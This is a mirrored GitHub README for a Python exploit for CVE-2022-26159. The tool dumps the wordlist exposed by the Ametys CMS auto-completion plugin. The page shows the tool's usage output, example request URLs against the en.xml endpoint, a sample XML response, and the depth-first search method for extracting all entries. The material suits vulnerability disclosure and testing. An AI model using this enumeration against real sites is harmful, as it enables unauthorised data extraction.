Movatterモバイル変換

[0]ホーム
URL:

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

 Sign up
Appearance settings

A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.

NotificationsYou must be signed in to change notification settings

p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.
GitHub release (latest by date)YouTube Channel Subscribers

Features

  • Automatic detection of maximum results returned by the autocompletion plugin.
  • Depth first search to dump all the results.
  • Output log file.

Usage

$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -hCVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podaliriususage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]Description messageoptional arguments:  -h, --help            show this help message and exit  -t TARGET, --target TARGET                        arg1 help message  -H HEADERS, --header HEADERS                        Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")  -k, --insecure        Disable SSL/TLS warnings and certificate verification.  -v, --verbose         Verbose mode. (default: False)  -q, --quiet           Quiet mode. (default: False)  --no-colors           Disables colored output. (default: False)

Technical details

The autocompletion plugin in Ametys CMS <= 4.4.9 exposes publicly an XML file containing a wordlist at the following address:

https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml

To perform a request on this database, an attacker just needs to type the start of the word in theq (query) parameter:

https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm

And the auto-completion plugin returns the first 10 matching words starting withadm (from the query) in an XML file:

<?xml version="1.0" encoding="UTF-8"?><auto-completion>    <item>administrateur</item>    <item>administrateurs</item>    <item>administratif</item>    <item>administratifs</item>    <item>administration</item>    <item>administrations</item>    <item>administrative</item>    <item>administratives</item>    <item>administres</item>    <item>admission</item></auto-completion>

With this in mind, an attacker just needs to perform adepth first search on the API to extract all the content of it.

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

References

About

A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.

Topics

Resources

Stars

Watchers

Forks

Sponsor this project

  •  

Languages

[8]ページ先頭
©2009-2025 Movatter.jp